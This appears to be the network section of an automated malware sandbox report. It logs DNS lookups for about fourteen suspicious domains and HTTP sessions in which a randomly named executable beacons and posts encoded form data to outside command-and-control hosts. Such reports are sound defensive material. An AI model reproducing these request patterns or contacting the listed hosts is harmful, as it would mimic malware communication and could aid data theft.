                Aug 23, 2024 04:21:05.202802896 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:05.207561016 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837100983 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837124109 CEST804976691.195.240.19192.168.2.4
                Aug 23, 2024 04:21:05.837188959 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:06.713589907 CEST4976680192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.730258942 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.735301971 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:07.735371113 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.737508059 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:07.742331982 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.371984959 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.372037888 CEST804976791.195.240.19192.168.2.4
                Aug 23, 2024 04:21:08.372143030 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:09.242371082 CEST4976780192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.263542891 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.268471003 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.268624067 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.275573015 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.280447960 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280467987 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280499935 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280510902 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280523062 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280628920 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280637980 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280647039 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.280656099 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.901503086 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.944772005 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:10.997838020 CEST804976891.195.240.19192.168.2.4
                Aug 23, 2024 04:21:10.997920990 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:11.772892952 CEST4976880192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.793906927 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.798975945 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:12.801750898 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.805797100 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:12.810576916 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440695047 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440716982 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:13.440846920 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:13.443298101 CEST4976980192.168.2.491.195.240.19
                Aug 23, 2024 04:21:13.448055029 CEST804976991.195.240.19192.168.2.4
                Aug 23, 2024 04:21:26.543554068 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.548405886 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:26.551661015 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.554316044 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:26.559109926 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:28.069752932 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:28.075301886 CEST8049770172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:28.075788975 CEST4977080192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.088607073 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.093663931 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:29.093806982 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.095901966 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:29.100708961 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:30.603595972 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:30.608813047 CEST8049771172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:30.611701012 CEST4977180192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.626210928 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.631227016 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.631294012 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.634447098 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:31.639522076 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639559984 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639581919 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639592886 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639601946 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639612913 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639703035 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639714003 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:31.639722109 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:33.147886992 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:33.153525114 CEST8049772172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:33.153582096 CEST4977280192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.167562008 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.172516108 CEST8049773172.67.210.102192.168.2.4
                Aug 23, 2024 04:21:34.175704002 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.179558992 CEST4977380192.168.2.4172.67.210.102
                Aug 23, 2024 04:21:34.184338093 CEST8049773172.67.210.102192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 23, 2024 04:18:26.767481089 CEST5832453192.168.2.41.1.1.1
                Aug 23, 2024 04:18:26.787959099 CEST53583241.1.1.1192.168.2.4
                Aug 23, 2024 04:18:42.525643110 CEST5635453192.168.2.41.1.1.1
                Aug 23, 2024 04:18:42.559762955 CEST53563541.1.1.1192.168.2.4
                Aug 23, 2024 04:18:56.093818903 CEST5627653192.168.2.41.1.1.1
                Aug 23, 2024 04:18:56.102713108 CEST53562761.1.1.1192.168.2.4
                Aug 23, 2024 04:19:04.240031958 CEST5024253192.168.2.41.1.1.1
                Aug 23, 2024 04:19:04.255341053 CEST53502421.1.1.1192.168.2.4
                Aug 23, 2024 04:19:12.322206974 CEST5577853192.168.2.41.1.1.1
                Aug 23, 2024 04:19:12.541707993 CEST53557781.1.1.1192.168.2.4
                Aug 23, 2024 04:19:27.354453087 CEST5401953192.168.2.41.1.1.1
                Aug 23, 2024 04:19:27.387181044 CEST53540191.1.1.1192.168.2.4
                Aug 23, 2024 04:19:35.463964939 CEST6334753192.168.2.41.1.1.1
                Aug 23, 2024 04:19:36.075088024 CEST53633471.1.1.1192.168.2.4
                Aug 23, 2024 04:19:49.613756895 CEST5851153192.168.2.41.1.1.1
                Aug 23, 2024 04:19:49.704596996 CEST53585111.1.1.1192.168.2.4
                Aug 23, 2024 04:20:03.494487047 CEST6130553192.168.2.41.1.1.1
                Aug 23, 2024 04:20:03.925129890 CEST53613051.1.1.1192.168.2.4
                Aug 23, 2024 04:20:38.119743109 CEST5761253192.168.2.41.1.1.1
                Aug 23, 2024 04:20:38.139714956 CEST53576121.1.1.1192.168.2.4
                Aug 23, 2024 04:20:51.567627907 CEST5854353192.168.2.41.1.1.1
                Aug 23, 2024 04:20:51.602710962 CEST53585431.1.1.1192.168.2.4
                Aug 23, 2024 04:21:05.112663031 CEST5838053192.168.2.41.1.1.1
                Aug 23, 2024 04:21:05.192879915 CEST53583801.1.1.1192.168.2.4
                Aug 23, 2024 04:21:18.448021889 CEST5017753192.168.2.41.1.1.1
                Aug 23, 2024 04:21:18.460922003 CEST53501771.1.1.1192.168.2.4
                Aug 23, 2024 04:21:26.526299000 CEST5940453192.168.2.41.1.1.1
                Aug 23, 2024 04:21:26.538875103 CEST53594041.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Aug 23, 2024 04:18:26.767481089 CEST192.168.2.41.1.1.10x8cbStandard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                Aug 23, 2024 04:18:42.525643110 CEST192.168.2.41.1.1.10xa130Standard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:18:56.093818903 CEST192.168.2.41.1.1.10x71bbStandard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:04.240031958 CEST192.168.2.41.1.1.10xfceeStandard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:12.322206974 CEST192.168.2.41.1.1.10xd239Standard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:27.354453087 CEST192.168.2.41.1.1.10xffd0Standard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:35.463964939 CEST192.168.2.41.1.1.10x4ae6Standard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:49.613756895 CEST192.168.2.41.1.1.10xe63aStandard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:03.494487047 CEST192.168.2.41.1.1.10xe987Standard query (0)www.anuts.topA (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:38.119743109 CEST192.168.2.41.1.1.10x6a79Standard query (0)www.telwisey.infoA (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:51.567627907 CEST192.168.2.41.1.1.10x35b6Standard query (0)www.sandranoll.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:05.112663031 CEST192.168.2.41.1.1.10xa78fStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:18.448021889 CEST192.168.2.41.1.1.10x1c1eStandard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:26.526299000 CEST192.168.2.41.1.1.10x1268Standard query (0)www.dmtxwuatbz.ccA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Aug 23, 2024 04:18:26.787959099 CEST1.1.1.1192.168.2.40x8cbNo error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
                Aug 23, 2024 04:18:42.559762955 CEST1.1.1.1192.168.2.40xa130No error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                Aug 23, 2024 04:18:56.102713108 CEST1.1.1.1192.168.2.40x71bbName error (3)www.hatercoin.onlinenonenoneA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:04.255341053 CEST1.1.1.1192.168.2.40xfceeName error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:12.541707993 CEST1.1.1.1192.168.2.40xd239No error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:27.387181044 CEST1.1.1.1192.168.2.40xffd0Name error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:36.075088024 CEST1.1.1.1192.168.2.40x4ae6No error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:49.704596996 CEST1.1.1.1192.168.2.40xe63aNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                Aug 23, 2024 04:19:49.704596996 CEST1.1.1.1192.168.2.40xe63aNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:03.925129890 CEST1.1.1.1192.168.2.40xe987No error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:38.139714956 CEST1.1.1.1192.168.2.40x6a79No error (0)www.telwisey.info199.192.19.19A (IP address)IN (0x0001)false
                Aug 23, 2024 04:20:51.602710962 CEST1.1.1.1192.168.2.40x35b6No error (0)www.sandranoll.com213.145.228.16A (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:05.192879915 CEST1.1.1.1192.168.2.40xa78fNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                Aug 23, 2024 04:21:05.192879915 CEST1.1.1.1192.168.2.40xa78fNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:18.460922003 CEST1.1.1.1192.168.2.40x1c1eName error (3)www.helpers-lion.onlinenonenoneA (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:26.538875103 CEST1.1.1.1192.168.2.40x1268No error (0)www.dmtxwuatbz.cc172.67.210.102A (IP address)IN (0x0001)false
                Aug 23, 2024 04:21:26.538875103 CEST1.1.1.1192.168.2.40x1268No error (0)www.dmtxwuatbz.cc104.21.45.56A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • www.hprlz.cz
                • www.catherineviskadi.com
                • www.bfiworkerscomp.com
                • www.xn--fhq1c541j0zr.com
                • www.xn--matfrmn-jxa4m.se
                • www.anuts.top
                • www.telwisey.info
                • www.sandranoll.com
                • www.gipsytroya.com
                • www.dmtxwuatbz.cc

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.4497365.44.111.162802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:18:26.800393105 CEST506OUTGET /w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.hprlz.cz
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:18:27.482528925 CEST745INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Fri, 23 Aug 2024 02:18:27 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 387
                Connection: close
                Location: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 62 42 37 4c 35 3d 44 50 74 30 2d 72 51 70 4d 58 70 74 26 61 6d 70 3b 41 5a 4f 54 63 66 65 78 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 [TRUNCATED]
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&amp;AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449737217.160.0.106802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:18:42.569592953 CEST796OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
                Data Ascii: AZOTcfex=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                Aug 23, 2024 04:18:43.215931892 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:43 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449738217.160.0.106802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:18:45.111944914 CEST816OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                Data Ascii: AZOTcfex=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                Aug 23, 2024 04:18:45.757328987 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:45 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.449739217.160.0.106802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:18:47.762895107 CEST10898OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 